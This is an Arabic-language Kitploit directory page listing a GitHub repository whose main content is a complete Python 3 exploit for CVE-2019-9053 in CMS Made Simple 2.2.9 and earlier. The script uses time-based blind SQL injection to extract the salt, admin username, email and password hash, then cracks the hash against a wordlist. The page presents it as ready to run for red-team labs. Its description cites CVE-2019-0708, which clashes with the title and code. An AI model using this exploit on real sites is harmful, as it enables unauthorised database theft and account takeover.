Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-exploit-lab — استغلالات Python cve-2019-9053– من HackHeart | Kitploit
أدوات/GitHubGitHub/hackheart-tech/-exploit-lab
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubhackheart-tech/-exploit-lab

-exploit-lab

استغلالات Python cve-2019-9053– من HackHeart

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

-exploit-lab

استغلالات بايثون لـ cve-2019-0708 – بواسطة HackHeart 🧠 مراجعة الكود والترحيل - بايثون 2 ← بايثون 3 تم كتابة هذا الاستغلال أصلاً بلغة بايثون 2، والتي لم تعد مدعومة من الأنظمة الحديثة. لضمان التوافق والحفاظ على أدوات مستقبلية، تم مراجعة قاعدة الكود بأكملها بعناية وترحيلها إلى بايثون 3.

🔧 التحسينات الرئيسية أثناء الترحيل:

  • تم تحديث عبارات print إلى بناء جملة بايثون 3
  • تم استبدال raw_input() بـ input()
  • تم تكييف عمليات socket للتعامل مع byte/str بشكل صحيح (تمت إضافة .decode())
  • تمت إزالة الطرق المهملة مثل xrange() و .iteritems()
  • تم التحقق من توافق السكريبت مع بايثون 3.8+ وتوزيعات لينكس الحديثة

🛡️ يحافظ هذا الإصدار على منطق الاستغلال سليماً مع ضمان:

  • التوافق مع مختبرات OSCP / الفريق الأحمر الحديثة
  • بناء جملة أنظف وأكثر أماناً وقابلية للقراءة
  • جاهز للتشغيل في البيئات الحديثة (VS Code, Kali, Parrot OS…)

#!/usr/bin/env python3

CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection

import requests import time import argparse import hashlib

parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)") parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password") parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")

args = parser.parse_args()

url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0' session = requests.Session() dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$' TIME = 1

flag = True salt = '' username = '' email = '' password_hash = '' output = ""

def dump_field(field_name, table, column, condition): global flag result = "" ord_result = "" while flag: flag = False for char in dictionary: temp_result = result + char ord_temp_result = ord_result + format(ord(char), "x") print(f"[*] Trying {temp_result}") payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+" start_time = time.time() session.get(url_vuln + "&m1_idlist=" + payload) if time.time() - start_time >= TIME: result = temp_result ord_result = ord_temp_result flag = True break return result

print("[+] Extracting salt...") flag = True salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b") output += f"Salt: {salt}\n"

print("[+] Extracting username...") flag = True username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31") output += f"Username: {username}\n"

print("[+] Extracting email...") flag = True email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31") output += f"Email: {email}\n"

print("[+] Extracting password hash...") flag = True password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31") output += f"Hash: {password_hash}\n"

if args.crack and args.wordlist: print("[+] Cracking password...") with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f: for line in f: word = line.strip() print(f"[*] Trying password: {word}") if hashlib.md5((salt + word).encode()).hexdigest() == password_hash: output += f"[+] Password cracked: {word}\n" break

print("\n=== Exploit Results ===") print(output)

تنزيل الأداة